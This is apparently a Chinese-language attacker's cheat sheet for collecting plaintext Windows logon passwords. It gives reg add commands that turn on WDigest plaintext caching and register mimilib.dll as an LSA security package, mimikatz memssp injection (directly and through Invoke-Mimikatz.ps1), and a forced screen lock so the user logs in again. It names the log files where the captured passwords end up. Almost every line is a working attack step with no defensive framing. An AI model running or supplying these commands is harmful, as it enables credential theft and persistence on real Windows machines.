0x01 修改注册表方式
修改成记录明文密码
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
修改不记录明文密码
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
锁屏
rundll32.exe user32.dll,LockWorkStation
0x02 mimikatz插ssp记录密码
使用mimikatz中的一个功能点
privilege::debug、misc::memssp
修改完之后使用以下命令锁屏,等用户进入后就可以在C:WindowsSystem32mimilsa.log里面存储登录的密码
rundll32.exe user32.dll,LockWorkStation
0x03 使用Invoke-Mimikatz.ps1
Import-Module .Invoke-Mimikatz.ps1 //导入命令
Invoke-Mimikatz -Command "misc::memssp" //不需要重启获取
记录的明文密码存储在这个路径下
凭据收集总结
0x04 复制mimilib.dll+修改注册表
在mimikatz中有32和64两个版本,安装包里分别都带有不同位数的mimilib.dll
将对应版本的dll文件复制到 c:windowssystem32下
将以下注册表位置中Security Packages的值设置为mimilib.dll
reg add HKLMSYSTEMCurrentControlSetControlLsa /v "Security Packages" /t REG_MULTI_SZ /d mimilib.dll /f
等待系统重启后,在c:windowssystem32生成文件kiwissp.log,记录当前用户的明文口令